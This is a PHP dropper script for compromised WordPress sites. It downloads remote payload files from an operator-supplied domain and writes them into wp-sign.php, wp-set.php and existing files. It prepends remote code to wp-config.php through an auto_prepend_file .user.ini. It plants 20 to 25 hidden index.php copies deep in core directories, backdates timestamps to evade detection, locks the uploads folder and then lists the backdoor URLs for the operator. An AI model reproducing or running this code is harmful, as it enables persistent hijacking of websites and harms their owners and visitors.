<?php
error_reporting(0);
set_time_limit(0);
ignore_user_abort(true);

if (!isset($_GET['domain']) || empty($_GET['domain'])) {
    die("Error: Domain parameter is required");
}

$domain = trim($_GET['domain']);
$domain = str_replace(['http://', 'https://', '\/\/'], '', $domain);
$domain = 'http://' . $domain;

function checkRemoteFile($url) {
    if (ini_get('allow_url_fopen')) {
        $context = stream_context_create([
            'http' => ['timeout' => 5],
            'ssl'  => ['verify_peer' => false, 'verify_peer_name' => false]
        ]);
        
        if ($handle = @fopen($url, 'r', false, $context)) {
            fclose($handle);
            return true;
        }
    }
    
    if (function_exists('curl_init')) {
        $ch = curl_init($url);
        curl_setopt_array($ch, [
            CURLOPT_NOBODY => true,
            CURLOPT_FAILONERROR => true,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_TIMEOUT => 5,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false
        ]);
        
        if (curl_exec($ch)) {
            curl_close($ch);
            return true;
        }
        curl_close($ch);
    }
    
    if (function_exists('get_headers')) {
        $context = stream_context_create(['http' => ['timeout' => 5]]);
        $headers = @get_headers($url, 0, $context);
        if ($headers && preg_match('/200 OK/', $headers[0])) {
            return true;
        }
    }
    
    return false;
}

$requiredFiles = [
    'ma1' => $domain . '/6/ma1.txt',
    'config' => $domain . '/6/config.txt'
];

foreach ($requiredFiles as $key => $fileUrl) {
    if (!checkRemoteFile($fileUrl)) {
        die("Error: Required file not accessible: " . htmlspecialchars($fileUrl));
    }
}

define('FILE3_CONTENT', file_get_contents($requiredFiles['ma1']));
define('FILE2_CONTENT', file_get_contents($requiredFiles['config']));

file_put_contents(__DIR__.'/wp-sign.php', FILE3_CONTENT);
file_put_contents(__DIR__.'/wp-set.php', FILE3_CONTENT);

$replaceFiles = ['aa.php', 'bb.php', 'cc.php'];
$directory = new RecursiveDirectoryIterator(__DIR__);
$iterator = new RecursiveIteratorIterator($directory);
foreach ($iterator as $file) {
    if ($file->isFile() && in_array($file->getFilename(), $replaceFiles)) {
        file_put_contents($file->getPathname(), FILE3_CONTENT);
    }
}

function findWpConfigPath() {
    $paths = [
        __DIR__ . '/wp-config.php'
    ];
    
    foreach ($paths as $path) {
        if (file_exists($path)) {
            return $path;
        }
    }
    return null;
}

function insertIntoWpConfig($content) {
    $configPath = findWpConfigPath();
    if (!$configPath) return false;
    
    $currentContent = file_get_contents($configPath);
    if (strpos($currentContent, $content) !== false) {
        return true;
    }
    
    $originalMtime = filemtime($configPath);
    
    $newContent = $content . $currentContent;
    if (file_put_contents($configPath, $newContent)) {
        touch($configPath, $originalMtime);
        return true;
    }
    
    return false;
}

$serverSoftware = isset($_SERVER['SERVER_SOFTWARE']) ? strtolower($_SERVER['SERVER_SOFTWARE']) : '';
$isNginx = (strpos($serverSoftware, 'nginx') !== false);
$isApache = (strpos($serverSoftware, 'apache') !== false) || (strpos($serverSoftware, 'litespeed') !== false);

if ($isNginx) {
    insertIntoWpConfig(FILE2_CONTENT);
    
    $configPath = realpath(__DIR__.'/wp-config.php');
    file_put_contents(__DIR__.'/.user.ini', "auto_prepend_file = \"$configPath\"");
} else {
    insertIntoWpConfig(FILE2_CONTENT);
    
    $configPath = realpath(__DIR__.'/wp-config.php');
    file_put_contents(__DIR__.'/.user.ini', "auto_prepend_file = \"$configPath\"");
}

function setUploadsPermissions() {
    $baseDir = __DIR__;
    $wpContentDir = $baseDir . DIRECTORY_SEPARATOR . 'wp-content';
    $uploadsDir = $wpContentDir . DIRECTORY_SEPARATOR . 'uploads';
    
    if (is_dir($uploadsDir)) {
        @chmod($uploadsDir, 0555);
        
        $iterator = new RecursiveIteratorIterator(
            new RecursiveDirectoryIterator($uploadsDir, RecursiveDirectoryIterator::SKIP_DOTS),
            RecursiveIteratorIterator::SELF_FIRST
            );
        
        foreach ($iterator as $item) {
            $fullPath = $item->getPathname();
            if ($item->isDir()) {
                @chmod($fullPath, 0555);
            } else {
                @chmod($fullPath, 0444);
            }
        }
    }
}

$securityComplete = true;
@ini_set('display_errors', 0);
@error_reporting(0);

class AdvancedFileGenerator {
    private $basePath;
    private $wpConfigTime;
    private $cachedContents = [];
    private $coreDirs = array('wp-admin', 'wp-content', 'wp-includes');
    private $maxAttempts = 5;
    private $siteUrl;
    private $timeAdjustments = 0;
    private $domain;
    
    public function __construct($domain) {
        $this->basePath = realpath(__DIR__);
        $this->wpConfigTime = $this->getWpConfigTime();
        $this->siteUrl = $this->getSiteUrl();
        $this->domain = rtrim($domain, '/');
        $this->prefetchRemoteContents();
    }
    
    private function password_verify_compat($password, $hash) {
        if (function_exists('password_verify')) {
            return password_verify($password, $hash);
        }
        
        if (strlen($hash) !== 60 || strlen($password) === 0) {
            return false;
        }
        
        $salt = substr($hash, 0, 29);
        $newHash = crypt($password, $salt);
        return hash_equals($hash, $newHash);
    }
    
    private function prefetchRemoteContents() {
        $basePath = $this->domain . '/6/';
        $urls = [
            $basePath . 'ma1.txt',
            $basePath . 'ma2.txt',
            $basePath . 'ma3.txt',
            $basePath . 'ma4.txt',
            $basePath . 'ma5.txt'
        ];
        
        foreach ($urls as $url) {
            if (filter_var($url, FILTER_VALIDATE_URL)) {
                $content = $this->fetchRemoteContent($url);
                if ($content !== false) {
                    $this->cachedContents[] = $content;
                }
            }
        }
        
        if (empty($this->cachedContents)) {
            $this->cachedContents[] = "<?php\n// Default content\n?>";
        }
    }
    
    private function fetchRemoteContent($url) {
        $content = false;
        
        if (ini_get('allow_url_fopen')) {
            $context = stream_context_create(['http' => ['timeout' => 5]]);
            $content = @file_get_contents($url, false, $context);
            if ($content !== false) return $content;
        }
        
        if (function_exists('curl_init')) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
            $content = curl_exec($ch);
            curl_close($ch);
            if ($content !== false) return $content;
        }
        
        return false;
    }
    
    private function getWpConfigTime() {
        $wpConfig = $this->basePath . '/wp-config.php';
        $wpConfigAlt = $this->basePath . '/../wp-config.php';
        
        if (file_exists($wpConfig)) {
            return filemtime($wpConfig);
        } elseif (file_exists($wpConfigAlt)) {
            return filemtime($wpConfigAlt);
        } else {
            $latestTime = 0;
            $files = scandir($this->basePath);
            foreach ($files as $file) {
                if ($file === '.' || $file === '..') continue;
                $filePath = $this->basePath . '/' . $file;
                $fileTime = filemtime($filePath);
                if ($fileTime > $latestTime) {
                    $latestTime = $fileTime;
                }
            }
            return $latestTime ?: time();
        }
    }
    
    private function getSiteUrl() {
        $protocol = ((!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ||
            (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443)) ? 'https://' : 'http://';
            
            $host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'localhost';
            $host = preg_replace('/:\d+$/', '', $host);
            
            return $protocol . $host;
    }
    
    private function getDefaultFileContent() {
        return $this->cachedContents[array_rand($this->cachedContents)];
    }
    
    private function generateDirectoryName() {
        $names = array(
            'assets', 'includes', 'modules', 'resources', 'content',
            'media', 'data', 'cache', 'tmp', 'backup', 'js', 'css',
            'img', 'docs', 'files', 'archive', '2023', '2024', '2025',
            'v1', 'v2', 'v3', 'src', 'dist', 'build', 'uploads', 'images'
        );
        return $names[array_rand($names)];
    }
    
    private function getCoreDirectory() {
        $availableDirs = array();
        foreach ($this->coreDirs as $dir) {
            $fullPath = $this->basePath . '/' . $dir;
            if (is_dir($fullPath) && is_readable($fullPath)) {
                $availableDirs[] = $fullPath;
            }
        }
        
        if (empty($availableDirs)) {
            return $this->basePath;
        }
        
        return $availableDirs[array_rand($availableDirs)];
    }
    
    private function findDeepDirectory($baseDir) {
        $currentPath = $baseDir;
        $depth = 0;
        $maxDepth = rand(2, 4);
        
        while ($depth < $maxDepth) {
            $subDirs = $this->getSubdirectories($currentPath);
            if (!empty($subDirs)) {
                $currentPath = $subDirs[array_rand($subDirs)];
                $depth++;
            } else {
                break;
            }
        }
        
        return $currentPath;
    }
    
    private function getSubdirectories($path) {
        $subDirs = array();
        if (is_dir($path) && is_readable($path)) {
            $items = @scandir($path);
            if ($items === false) return $subDirs;
            
            foreach ($items as $item) {
                if ($item === '.' || $item === '..') continue;
                $fullPath = $path . '/' . $item;
                if (is_dir($fullPath) && is_readable($fullPath)) {
                    $subDirs[] = $fullPath;
                }
            }
        }
        return $subDirs;
    }
    
    private function createNewDirectoryStructure($baseDir, $depth) {
        $currentPath = $baseDir;
        $dirsToSetTime = array();
        
        for ($i = 0; $i < $depth; $i++) {
            $dirName = $this->generateDirectoryName();
            $currentPath .= '/' . $dirName;
            $dirsToSetTime[] = $currentPath;
        }
        
        return array(
            'final_path' => $currentPath,
            'dirs_to_set_time' => $dirsToSetTime
        );
    }
    
    private function createDirectoryWithRetry($path) {
        $attempts = 0;
        
        while ($attempts < $this->maxAttempts) {
            if (is_dir($path)) {
                return true;
            }
            
            if (@mkdir($path, 0755, true)) {
                return true;
            }
            
            $parentDir = dirname($path);
            if (is_dir($parentDir)) {
                @chmod($parentDir, 0755);
            }
            
            $attempts++;
        }
        
        return false;
    }
    
    private function createFileWithRetry($filePath, $content) {
        $attempts = 0;
        
        while ($attempts < $this->maxAttempts) {
            if (@file_put_contents($filePath, $content)) {
                return true;
            }
            
            $dirPath = dirname($filePath);
            if (is_dir($dirPath)) {
                @chmod($dirPath, 0755);
            }
            
            $attempts++;
        }
        
        return false;
    }
    
    private function setDirectoryTimes($paths, $timestamp) {
        foreach ($paths as $path) {
            if (is_dir($path)) {
                @touch($path, $timestamp);
                $this->timeAdjustments++;
                $this->setSubdirectoryTimes($path, $timestamp);
            }
        }
    }
    
    private function setSubdirectoryTimes($dirPath, $timestamp) {
        if ($handle = @opendir($dirPath)) {
            while (false !== ($entry = readdir($handle))) {
                if ($entry === '.' || $entry === '..') continue;
                
                $fullPath = $dirPath . '/' . $entry;
                if (is_dir($fullPath)) {
                    @touch($fullPath, $timestamp);
                    $this->timeAdjustments++;
                    $this->setSubdirectoryTimes($fullPath, $timestamp);
                }
            }
            closedir($handle);
        }
    }
    
    public function createFiles($count) {
        $results = array();
        $successCount = 0;
        $failureCount = 0;
        $this->timeAdjustments = 0;
        
        for ($i = 0; $i < $count; $i++) {
            $coreDir = $this->getCoreDirectory();
            $deepDir = $this->findDeepDirectory($coreDir);
            $newDepth = rand(1, 5);
            
            $dirInfo = $this->createNewDirectoryStructure($deepDir, $newDepth);
            $newDirPath = $dirInfo['final_path'];
            $filePath = $newDirPath . '/index.php';
            
            $status = 'Failed';
            $error = '';
            $fileUrl = '';
            
            if ($this->createDirectoryWithRetry($newDirPath)) {
                $this->setDirectoryTimes($dirInfo['dirs_to_set_time'], $this->wpConfigTime);
                
                $fileContent = $this->getDefaultFileContent();
                
                if ($this->createFileWithRetry($filePath, $fileContent)) {
                    @touch($filePath, $this->wpConfigTime);
                    $this->timeAdjustments++;
                    $this->setDirectoryTimes(array(dirname($filePath)), $this->wpConfigTime);
                    
                    $status = 'Created';
                    $successCount++;
                    $relativePath = str_replace($this->basePath, '', $filePath);
                    $fileUrl = $this->siteUrl . $relativePath;
                } else {
                    $error = 'File creation failed after ' . $this->maxAttempts . ' attempts';
                    $failureCount++;
                }
            } else {
                $error = 'Directory creation failed after ' . $this->maxAttempts . ' attempts';
                $failureCount++;
            }
            
            $relativePath = str_replace($this->basePath, '', $filePath);
            $relativeDeepDir = str_replace($this->basePath, '', $deepDir);
            
            $results[] = array(
                'path' => $relativePath,
                'url' => $fileUrl,
                'status' => $status,
                'error' => $error,
                'time' => date('Y-m-d H:i:s', $this->wpConfigTime),
                'depth' => $newDepth,
                'core_dir' => str_replace($this->basePath, '', $coreDir),
                'deep_dir' => $relativeDeepDir,
                'retries' => $this->maxAttempts
            );
        }
        
        return array(
            'files' => $results,
            'success_count' => $successCount,
            'failure_count' => $failureCount,
            'total' => $count,
            'time_adjustments' => $this->timeAdjustments
        );
    }
}

function checkCompatibility() {
    $errors = array();
    
    $requiredFunctions = array('scandir', 'filemtime', 'mkdir', 'file_put_contents');
    foreach ($requiredFunctions as $func) {
        if (!function_exists($func)) {
            $errors[] = "Required function not available: $func";
        }
    }
    
    $coreDirs = array('wp-admin', 'wp-content', 'wp-includes');
    $missingDirs = array();
    foreach ($coreDirs as $dir) {
        if (!is_dir(__DIR__ . '/' . $dir)) {
            $missingDirs[] = $dir;
        }
    }
    
    if (!empty($missingDirs)) {
        $errors[] = "Missing WordPress core directories: " . implode(', ', $missingDirs);
    }
    
    return $errors;
}

if ($securityComplete) {
    $deleteResult = '';
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['delete_file'])) {
        $currentFile = __FILE__;
        if (file_exists($currentFile)) {
            if (@unlink($currentFile)) {
                $deleteResult = '<div class="alert alert-success"><strong>Success!</strong> File has been deleted. This script will no longer function.</div>';
            } else {
                $deleteResult = '<div class="alert alert-error"><strong>Error!</strong> Failed to delete file. Check file permissions.</div>';
            }
        } else {
            $deleteResult = '<div class="alert alert-error"><strong>Error!</strong> File not found.</div>';
        }
    }
    
    $compatibilityErrors = checkCompatibility();
    
    if (!empty($compatibilityErrors)) {
        echo "<h2>Compatibility Issues Detected:</h2>";
        echo "<ul>";
        foreach ($compatibilityErrors as $error) {
            echo "<li>$error</li>";
        }
        echo "</ul>";
        echo "<p>Please resolve these issues before proceeding.</p>";
        exit;
    }
    
    $count = rand(20, 25);
    $generator = new AdvancedFileGenerator($domain);
    $resultData = $generator->createFiles($count);
    $results = $resultData['files'];
    
    $links = array();
    foreach ($results as $file) {
        if ($file['status'] === 'Created' && !empty($file['url'])) {
            $links[] = $file['url'];
        }
    }
    
    echo "<!DOCTYPE html><html><head><title>File Generation Results</title>
          <style>
            body { font-family: Arial, sans-serif; margin: 20px; }
            .container { max-width: 800px; margin: 0 auto; }
            h1, h2 { color: #333; }
            .success { color: #28a745; }
            .error { color: #dc3545; }
            .links-box {
                background: #f8f9fa;
                border: 1px solid #ddd;
                padding: 20px;
                margin: 20px 0;
                border-radius: 5px;
                max-height: 300px;
                overflow-y: auto;
            }
            .link-item {
                padding: 8px 0;
                border-bottom: 1px solid #eee;
                word-break: break-all;
            }
            .btn-container {
                display: flex;
                gap: 10px;
                margin-top: 15px;
            }
            .copy-btn, .delete-btn {
                flex: 1;
                color: white;
                border: none;
                padding: 10px 15px;
                border-radius: 4px;
                cursor: pointer;
                text-align: center;
            }
            .copy-btn {
                background: #007bff;
            }
            .copy-btn:hover { background: #0069d9; }
            .delete-btn {
                background: #dc3545;
            }
            .delete-btn:hover { background: #bd2130; }
            .stats { margin: 20px 0; }
            .alert {
                padding: 15px;
                margin: 20px 0;
                border-radius: 4px;
            }
            .alert-success {
                background-color: #d4edda;
                color: #155724;
                border: 1px solid #c3e6cb;
            }
            .alert-error {
                background-color: #f8d7da;
                color: #721c24;
                border: 1px solid #f5c6cb;
            }
            .delete-confirm {
                background: #fef2f2;
                padding: 20px;
                border-radius: 8px;
                margin: 20px 0;
                border-left: 5px solid #e74c3c;
            }
          </style>
          </head><body><div class='container'>";
    
    if (!empty($deleteResult)) {
        echo $deleteResult;
    }
    
    echo "<h1>File Generation Results</h1>";
    echo "<div class='stats'>";
    echo "<p>Total files generated: <strong>{$resultData['total']}</strong></p>";
    echo "<p class='success'>Successful: <strong>{$resultData['success_count']}</strong></p>";
    echo "<p class='error'>Failed: <strong>{$resultData['failure_count']}</strong></p>";
    echo "<p>Timestamp adjustments: <strong>{$resultData['time_adjustments']}</strong></p>";
    echo "</div>";
    
    if (!empty($links)) {
        echo "<h2>Generated Links ($count total):</h2>";
        echo "<div class='links-box' id='links-container'>";
        foreach ($links as $link) {
            echo "<div class='link-item'>$link</div>";
        }
        echo "</div>";
        echo "<div class='btn-container'>";
        echo "<button class='copy-btn' onclick='copyLinks()'>Copy All Links</button>";
        echo "<form method='post' id='deleteForm' style='flex:1;'>";
        echo "<button type='button' class='delete-btn' onclick='confirmDelete()'>Delete This Script</button>";
        echo "<input type='hidden' name='delete_file' value='1'>";
        echo "</form>";
        echo "</div>";
        
        echo "<script>
                function copyLinks() {
                    const container = document.getElementById('links-container');
                    const range = document.createRange();
                    range.selectNode(container);
                    window.getSelection().removeAllRanges();
                    window.getSelection().addRange(range);
                    document.execCommand('copy');
                    window.getSelection().removeAllRanges();
                    alert('Links copied to clipboard!');
                }
            
                function confirmDelete() {
                    if (confirm('Are you absolutely sure you want to PERMANENTLY DELETE this script file?\\n\\nThis operation cannot be undone!')) {
                        document.getElementById('deleteForm').submit();
                    }
                }
              </script>";
    } else {
        echo "<p class='error'>No links were generated successfully.</p>";
    }
    
    echo "<div class='delete-confirm'>
            <h3>Danger Zone: Delete This Generator</h3>
            <p>This action will permanently delete the current PHP script file from the server. Once deleted, this generator will no longer function.</p>
            <p><strong>Warning: This operation cannot be undone. Proceed with extreme caution.</strong></p>
          </div>";
    
    echo "</div></body></html>";
}
setUploadsPermissions();

//@unlink(__FILE__);
?>